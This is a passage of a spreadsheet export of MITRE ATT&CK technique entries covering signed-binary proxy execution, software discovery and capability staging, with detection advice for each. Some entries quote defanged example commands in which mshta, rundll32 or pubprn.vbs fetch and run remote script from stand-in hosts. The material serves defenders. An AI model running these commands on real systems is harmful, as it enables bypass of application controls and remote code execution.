* CPL format registered Control Panel items stored in the System32 directory are automatically shown in the Control Panel. Other Control Panel items will have registration entries in the &lt;code&gt;CPLs&lt;/code&gt; and &lt;code&gt;Extended Properties&lt;/code&gt; Registry keys of &lt;code&gt;HKEY_LOCAL_MACHINE or HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Control Panel&lt;/code&gt;. These entries may include information such as a GUID, path to the local file, and a canonical name used to launch the file programmatically (&lt;code&gt; WinExec("c:\windows\system32\control.exe {Canonical_Name}", SW_NORMAL);&lt;/code&gt;) or from a command line (&lt;code&gt;control.exe /name {Canonical_Name}&lt;/code&gt;).(Citation: Microsoft Implementing CPL)
* Some Control Panel items are extensible via Shell extensions registered in &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Controls Folder\{name}\Shellex\PropertySheetHandlers&lt;/code&gt; where {name} is the predefined name of the system item.(Citation: Microsoft Implementing CPL)
Analyze new Control Panel items as well as those present on disk for malicious content. Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques.(Citation: TrendMicro CPL Malware Jan 2014)</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Module: Module Load, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1218.004</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution: InstallUtil</t>
  </si>
  <si>
    <t>Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is digitally signed by Microsoft and located in the .NET directories on a Windows system: &lt;code&gt;C:\Windows\Microsoft.NET\Framework\v&lt;version&gt;\InstallUtil.exe&lt;/code&gt; and &lt;code&gt;C:\Windows\Microsoft.NET\Framework64\v&lt;version&gt;\InstallUtil.exe&lt;/code&gt;.
InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute &lt;code&gt;[System.ComponentModel.RunInstaller(true)]&lt;/code&gt;. (Citation: LOLBAS Installutil)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/004</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of InstallUtil.exe. Compare recent invocations of InstallUtil.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after the InstallUtil.exe invocation may also be useful in determining the origin and purpose of the binary being executed.</t>
  </si>
  <si>
    <t>Casey Smith; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>T1218.005</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution: Mshta</t>
  </si>
  <si>
    <t>Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) 
Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)
Files may be executed by mshta.exe through an inline script: &lt;code&gt;mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))&lt;/code&gt;
They may also be executed directly from URLs: &lt;code&gt;mshta http[:]//webserver/payload[.]hta&lt;/code&gt;
Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/005</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed.
Monitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>Ricardo Dias; Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank</t>
  </si>
  <si>
    <t>T1218.007</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution: Msiexec</t>
  </si>
  <si>
    <t>Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe is digitally signed by Microsoft.
Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the &lt;code&gt;AlwaysInstallElevated&lt;/code&gt; policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/007</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of msiexec.exe. Compare recent invocations of msiexec.exe with prior history of known good arguments and executed MSI files or DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of msiexec.exe may also be useful in determining the origin and purpose of the MSI files or DLLs being executed.</t>
  </si>
  <si>
    <t>Command: Command Execution, Module: Module Load, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>Alexandros Pappas</t>
  </si>
  <si>
    <t>T1218.008</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution: Odbcconf</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) Odbcconf.exe is digitally signed by Microsoft.
Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a &lt;code&gt;REGSVR&lt;/code&gt; flag that can be misused to execute DLLs (ex: &lt;code&gt;odbcconf.exe /S /A &amp;lbrace;REGSVR "C:\Users\Public\file.dll"&amp;rbrace;&lt;/code&gt;). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) 
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/008</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of odbcconf.exe. Compare recent invocations of odbcconf.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of odbcconf.exe may also be useful in determining the origin and purpose of the DLL being loaded.</t>
  </si>
  <si>
    <t>Command: Command Execution, Module: Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>T1218.009</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution: Regsvcs/Regasm</t>
  </si>
  <si>
    <t>Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
Both utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: &lt;code&gt;[ComRegisterFunction]&lt;/code&gt; or &lt;code&gt;[ComUnregisterFunction]&lt;/code&gt; respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/009</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of Regsvcs.exe and Regasm.exe. Compare recent invocations of Regsvcs.exe and Regasm.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after Regsvcs.exe or Regasm.exe invocation may also be useful in determining the origin and purpose of the binary being executed.</t>
  </si>
  <si>
    <t>Casey Smith</t>
  </si>
  <si>
    <t>T1218.010</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution: Regsvr32</t>
  </si>
  <si>
    <t>Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. (Citation: Microsoft Regsvr32)
Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)
Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/010</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the regsvr32.exe invocation may also be useful in determining the origin and purpose of the script or DLL being loaded. (Citation: Carbon Black Squiblydoo Apr 2016)</t>
  </si>
  <si>
    <t>T1218.011</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution: Rundll32</t>
  </si>
  <si>
    <t>Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions &lt;code&gt;Control_RunDLL&lt;/code&gt; and &lt;code&gt;Control_RunDLLAsUser&lt;/code&gt;. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)
Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: &lt;code&gt;rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"&lt;/code&gt;  This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/011</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded.</t>
  </si>
  <si>
    <t>Casey Smith; Ricardo Dias</t>
  </si>
  <si>
    <t>T1218.012</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution: Verclsid</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe)
Adversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running &lt;code&gt;verclsid.exe /S /C {CLSID}&lt;/code&gt;, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010)). Since it is signed and native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/012</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of verclsid.exe. Compare recent invocations of verclsid.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of verclsid.exe may also be useful in determining the origin and purpose of the payload being executed. Depending on the environment, it may be unusual for verclsid.exe to have a parent process of a Microsoft Office product. It may also be unusual for verclsid.exe to have any child processes or to make network connections or file modifications.</t>
  </si>
  <si>
    <t>Rodrigo Garcia, Red Canary</t>
  </si>
  <si>
    <t>T1216</t>
  </si>
  <si>
    <t>Signed Script Proxy Execution</t>
  </si>
  <si>
    <t>Adversaries may use scripts signed with trusted certificates to proxy execution of malicious files. Several Microsoft signed scripts that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1216</t>
  </si>
  <si>
    <t>Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>T1216.001</t>
  </si>
  <si>
    <t>Signed Script Proxy Execution: PubPrn</t>
  </si>
  <si>
    <t>Adversaries may use the trusted PubPrn script to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application control solutions that do not account for use of these scripts.
&lt;code&gt;PubPrn.vbs&lt;/code&gt; is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and can be used to proxy execution from a remote site.(Citation: Enigma0x3 PubPrn Bypass) An example command is &lt;code&gt;cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png&lt;/code&gt;.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1216/001</t>
  </si>
  <si>
    <t>03 February 2020</t>
  </si>
  <si>
    <t>T1072</t>
  </si>
  <si>
    <t>Software Deployment Tools</t>
  </si>
  <si>
    <t>Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.).
Access to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.
The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform it's intended purpose.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1072</t>
  </si>
  <si>
    <t>11 December 2020</t>
  </si>
  <si>
    <t>Execution, Lateral Movement</t>
  </si>
  <si>
    <t>Detection methods will vary depending on the type of third-party software or system and how it is typically used. 
The same investigation process can be applied here as with other potentially malicious activities where the distribution vector is initially unknown but the resulting activity follows a discernible pattern. Analyze the process execution trees, historical activities from the third-party application (such as what types of files are usually pushed), and the resulting activities or events from the file/binary/script pushed to systems. 
Often these third-party applications will have logs of their own that can be collected and correlated with other data from the environment. Ensure that third-party application logs are on-boarded to the enterprise logging system and the logs are regularly reviewed. Audit software deployment logs and look for suspicious or unauthorized activity. A system not typically used to push software to clients that suddenly is used for such a task outside of a known admin function may be suspicious. Monitor account login activity on these applications to detect suspicious/abnormal usage.
Perform application deployment at regular times so that irregular deployment activity stands out. Monitor process activity that does not correlate to known good software. Monitor account login activity on the deployment system.</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Process: Process Creation</t>
  </si>
  <si>
    <t>Shane Tully, @securitygypsy</t>
  </si>
  <si>
    <t>T1518</t>
  </si>
  <si>
    <t>Software Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1518</t>
  </si>
  <si>
    <t>16 September 2019</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</si>
  <si>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</si>
  <si>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Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>T1518.001</t>
  </si>
  <si>
    <t>Software Discovery: Security Software Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), &lt;code&gt;reg query&lt;/code&gt; with [Reg](https://attack.mitre.org/software/S0075), &lt;code&gt;dir&lt;/code&gt; with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.
Adversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1518/001</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</si>
  <si>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In cloud environments, additionally monitor logs for the usage of APIs that may be used to gather information about security software configurations within the environment.</t>
  </si>
  <si>
    <t>T1608</t>
  </si>
  <si>
    <t>Stage Capabilities</t>
  </si>
  <si>
    <t>Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://attack.mitre.org/techniques/T1587)) or obtained ([Obtain Capabilities](https://attack.mitre.org/techniques/T1588)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Capabilities can also be staged on web services, such as GitHub or Pastebin.(Citation: Volexity Ocean Lotus November 2020)
Staging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to):
* Staging web resources necessary to conduct [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) when a user browses to a site.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015)(Citation: ATT ScanBox)
* Staging web resources for a link target to be used with spearphishing.(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019)
* Uploading malware or tools to a location accessible to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).(Citation: Volexity Ocean Lotus November 2020)
* Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)).(Citation: DigiCert Install SSL Cert)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1608</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as initial access and post-compromise behaviors.</t>
  </si>
  <si>
    <t>T1608.004</t>
  </si>
  <si>
    <t>Stage Capabilities: Drive-by Target</t>
  </si>
  <si>
    <t>Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).
Adversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including inserting malicious script into web pages or other user controllable web content such as forum posts. Adversaries may also craft malicious web advertisements and purchase ad space on a website through legitimate ad providers. In addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT ScanBox)
Websites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack.
Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1608/004</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).</t>
  </si>
  <si>
    <t>T1608.003</t>
  </si>
  <si>
    <t>Stage Capabilities: Install Digital Certificate</t>
  </si>
  <si>
    <t>Adversaries may install SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are files that can be installed on servers to enable secure communications between systems. Digital certificates include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate securely with its owner. Certificates can be uploaded to a server, then the server can be configured to use the certificate to enable encrypted communication with it.(Citation: DigiCert Install SSL Cert)
Adversaries may install SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or lending credibility to a credential harvesting site. Installation of digital certificates may take place for a number of server types, including web servers and email servers. 
Adversaries can obtain digital certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) or create self-signed certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1587/003)). Digital certificates can then be installed on adversary controlled infrastructure that may have been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1608/003</t>
  </si>
  <si>
    <t>Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001) or [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).</t>
  </si>
  <si>
    <t>T1608.005</t>
  </si>
  <si>
    <t>Stage Capabilities: Link Target</t>
  </si>
  <si>
    <t>Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link. 
Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user.
Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also be employed.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1608/005</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003), [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002), or [Malicious Link](https://attack.mitre.org/techniques/T1204/001).</t>
  </si>
  <si>
    <t>T1608.001</t>
  </si>
  <si>
    <t>Stage Capabilities: Upload Malware</t>
  </si>
  <si>
    <t>Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
Malware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin.(Citation: Volexity Ocean Lotus November 2020)
Adversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). [Masquerading](https://attack.mitre.org/techniques/T1036) may increase the chance of users mistakenly executing these files.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1608/001</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle, such as [User Execution](https://attack.mitre.org/techniques/T1204) or [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).</t>
  </si>
  <si>
    <t>Kobi Haimovich, CardinalOps</t>
  </si>
  <si>
    <t>T1608.002</t>
  </si>
  <si>
    <t>Stage Capabilities: Upload Tool</t>
  </si>
  <si>
    <t>Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
Tools may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).(Citation: Dell TG-3390) Tools can also be staged on web services, such as an adversary controlled GitHub repo.
Adversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1608/002</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle, such as [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).</t>
  </si>
  <si>
    <t>T1528</t>
  </si>
  <si>
    <t>Steal Application Access Token</t>
  </si>
  <si>
    <t>Adversaries can steal user application access tokens as a means of acquiring credentials to access remote systems and resources. This can occur through social engineering and typically requires user action to grant access.
Application access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. 
